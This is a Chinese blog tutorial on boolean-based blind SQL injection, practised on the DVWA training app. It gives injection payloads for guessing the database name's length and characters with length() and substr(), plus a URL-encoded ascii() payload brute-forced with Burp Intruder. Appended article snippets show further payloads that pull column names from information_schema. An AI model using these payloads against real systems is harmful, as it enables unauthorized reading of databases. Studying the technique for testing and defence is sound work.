sql注入整理之布尔盲注入

最新推荐文章于 2024-07-09 21:03:25 发布
最新推荐文章于 2024-07-09 21:03:25 发布
阅读量1.9k 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37079022/article/details/131713492
版权
布尔注入是利用接口返回状态判断SQL注入的有效性。在DVWA中,通过测试确定注入点后,可以通过查询当前数据库名的长度和ASCII值来获取信息。例如,通过改变`length(database())`和`substr(database(),1,1)`的参数,配合ASCII表,可以逐字猜解数据库名。
摘要由CSDN通过智能技术生成

1什么是布尔注入 :注入内容后 接口不返回内容只返回正常或者不正常。

2为什么要用布尔注入: 因为正常注入无回显,但根据返回正常不正常状态可以判断我们输入的语句是否查询成功

首先 常用的函数 :

left(a,b):从左侧截取a的前b位

length(a):a长度

ascii(a):返回ascii码

if (a,b,c):如果a为真 返回b 否则反回c

substr(a,b,c):从b位开始截取a的c位长度

limit  a ,b:返回a到a+b条数据

 

dvwa 盲注

1确认是否有注入点

输入 1  显示 存在

输入 1' and '1'='2  显示 不存在

输入1' and '1'='1  显示 存在

表示有注入点 字符型  如果是数字型 输入 【1 and 1=2】【1 and 1=1】测试

 

2查询当前库名长度

database():当前数据库名称

length(a):a的长度

1' and length(database())=1 --     显示 不存在

1' and length(database())=2 --     显示 不存在

1' and length(database())=3 --     显示 不存在

1' and length(database())=4 --      显示 存在

说明长度为 4位

3诸位猜测库名称

substr(a,b,c):从b位开始截取a的c位长度

1' and substr(database(),1,1)='a' -- 显示 不存在

1' and substr(database(),1,1)='b' -- 显示 不存在

1' and substr(database(),1,1)='c' -- 显示 不存在

1' and substr(database(),1,1)='d' -- 显示 存在

第一位为d

1' and substr(database(),1,1)='a' -- 显示 不存在

.....

......

....

....

1' and substr(database(),1,1)='v' -- 显示 存在

第二位v

当然这种方法存手工 如果使用burp suit     

修改语句为

  1' and ascii(substr(database(),1,1))=1 --     使用ascii将值变为数字

url 转码为

1%27+and+ascii%28substr%28database%28%29%2C1%2C1%29%29%3D1+--++

录制请求添加到 inturder后 添加变更点

 

添加payload

选择数字  范围 48-122  覆盖 数字 大小写字母

 

 

启动攻击

查看结果

根据ascii表查询 首位 为d

 

 

 

 

 

刘临川
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
《网络安全自学教程》- SQL注入布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 2369
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
SQL注入bool注入
studyphp123的博客
04-18 1242
一、预备知识 二、实验目的 三、实验工具 浏览器 四、实验环境 客户机一台 五、实验步骤 第一步:访问 http://www.any.com/sqli/Less-8/?id=1 页面正常: 第二步:加单引号,访问 http://www.any.com/sqli/Less-8/?id=1' 不会报错,但是页面不正常,可以判断是bool型注入: 第三步:判断列数(通过二分法) 1)输:...
sql注入-基于布尔型的盲注
aoxiangzhi3576的博客
05-28 641
0-SQL盲注的手工注入测试 确定字段长度 1' and length(user())>12# 确定字段内容 1' and substring(user(),1,1)>'a'# 这里的substring()函数的作用是提取字符串中的字符.例如: substring('abcd',1,1)返回a subst...
sql注入布尔booler注入
最新发布
m0_52484587的博客
07-09 846
id=1' and substr((select column_name from information_schema.columns where table_schema='test' and table_name='users' limit 0,1),1,1)='a'--+ id username password 等。id=1' and substr(database(),1,1)='a'--+ 逐字判断数据库名为 test,test 数据库名。3.id=1 and 1=2 结果异常。
SQL注入——布尔盲注
heyingcheng的博客
03-07 721
当猜测是第一个字母的ascii码是115,页面显示为真,再查表,得出对应字母。后续的操作是依次猜解,陆续得出数据。布尔盲注:Web页面只返回True真,False假两种类型,利用页面的返回不同,逐个猜解数据。页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。对方既没有回显位又没有报错,如果页面有真假值切换,我们就可以使用布尔盲注。当我们猜解数据库名称的第一个字母的ascii是120,页面显示false。盲注分类:布尔盲注,时间盲注,报错盲注
SQL注入之路之二:布尔型(boolean)盲注
weixin_62715196的博客
08-10 1205
简单描述什么是布尔盲注以及对与布尔盲注如何进行注入,通过使用SQLmap自动化工具和人工结合burp suite两种方式讲述如何进行简单注入,并通过对DVWA靶场进行实操来验证手工结合burp suite实现布尔注入的合理性
SQL盲注第一天-布尔注入
2201_75389336的博客
01-19 260
SQL盲注第一天-布尔注入
SQL注入之基于布尔盲注详解
09-10
布尔SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
SQL注入原理及实践(一)–SQL注入布尔盲注
dulirongdudu的博客
08-02 2154
当不知道数据库返回值的情况下时【无回显】,输1’and‘1’='1和1’and‘1’='2显示不一样,仅返回正确、或者错误的页面时,存在布尔盲注。①if()if(条件,结果1,结果2)如果条件成立,则输出结果1,否则输出结果2。if(SUBSTRING(参数1,参数2,参数3),结果1.结果2)②字符串截取函数SUBSTRING(参数1,参数2,参数3)当假设长度为4时,返回正确的界面,因此数据库名为4位字符串。1’and‘1’='1为真返回正确的界面。.....................
sql注入讲解ppt.pptx
08-10
4. 布尔盲注:使用布尔逻辑来注入 SQL 语句。 七、SQL 注入常用知识: 1. 注释符:#、--、+ 等符号。 2. 联合查询:使用 UNION keyword 来连接两个查询结果。 3. ORDER BY:使用 ORDER BY keyword 来排序查询结果...
sqlserver数据库布尔盲注_SQL注入之基于布尔盲注详解
weixin_30623181的博客
12-24 1268
基于布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
SQL注入布尔式(boolean)注入
2301_79299101的博客
09-22 366
1' and if(substring(database(),1,1)='d',1,0)--+输1'and if(length(database())=4,1,0) #其他的表名和列都用同样的方法 ,其他信息也是一样。输 vince'and'1'='1。再输 vince'and'1'='2。2,判断是数字式还是字符型。3,判断数据库有多少个字段。
SQL注入之Bool盲注(510cms)
qq_45775897的博客
01-05 2980
SQL注入之get可以参考: https://blog.csdn.net/qq_45775897/article/details/122332051 一、查找是否存在SQL注入注入点) 以510企业网站为例: 这里以漏洞参数id为例 用?id=1和id=1'进行测试,前提能够正常显示。 在?id=1后面加上and 1=1两个结果都是真的,所以正常输出; 后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符型。反之是数值型 eg: http://IP地址(域名)/news.php?cid=&
SQLi-LABS
m0_74855736的博客
03-14 819
单引号闭合确定数据库查询的字段数确定显示位查询当前数据库名,查询当前数据库下所有的表查询user表中的字段数查询字段的数据。
SQL注入漏洞之布尔(Boolean)注入
m0_71109835的博客
02-01 1221
其一,前端传到后端的数据内容是用户可以控制的,如果这些数据不是用户可以控制的话SQL注入漏洞就无从谈起。其二:用户输的参数可以拼接的SQL语句中,并且可以被执行。:SQL注入之所以得以存在主要是因为WEB应用程序对用户输的数据没有进行有效的判断和过滤,从而导致用户的恶意SQL语句从前端传到后端,最后实现了对数据的窃取和破环。学习SQL注入首先要对一些常见的SQL语法有一定的了解,这样我们在使用SQL注入漏洞攻击对方时才能游刃有余。5.在得知数据库名字长度后,我们可以用穷举的方法猜测出数据库的名字。
sql注入-布尔盲注
weixin_54217950的博客
02-15 899
布尔盲注 典型应用场景:Web页面仅仅返回类似True或False的两种结果。 注入方式:进行SQL注入之后,根据页面返回的True或者是False来得到数据库中 的相关信息。 判断数据库名长度 and length(select database())=8)--+ 获取数据库名(逐个字母盲猜) and substr((select database()),1,1)='s'--+ 总结:语句固定,需要的话直接改里面的特定语句就行了。 ...
SQL注入布尔盲注
weixin_43765321的博客
03-03 1019
1. 盲注 布尔盲注 特点:页面存在异常,但是既无回显也无报错信息 利用:只能通过正确与错误两种状态来判断payload是否正确 没有显示位,也没有MySQL_error()函数 仅有的两段输出信息,如下图所示: 2. 布尔 布尔运算是数字符号化的逻辑推演法,包括联合、相交、相减。在图形处理操作中引了这种逻辑运算方法以使简单的基本图形组合产生新的形体,并由二维布尔运算发展到三维图形的布尔运算。由于布尔在符号逻辑运算中的特殊贡献,很多计算机语言中将逻辑运算称为布尔运算,将其结果称为布尔值。 3. 布尔
SQL注入-布尔盲注
acepanhuan的博客
02-10 1715
学习SQL注入方法之盲注
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值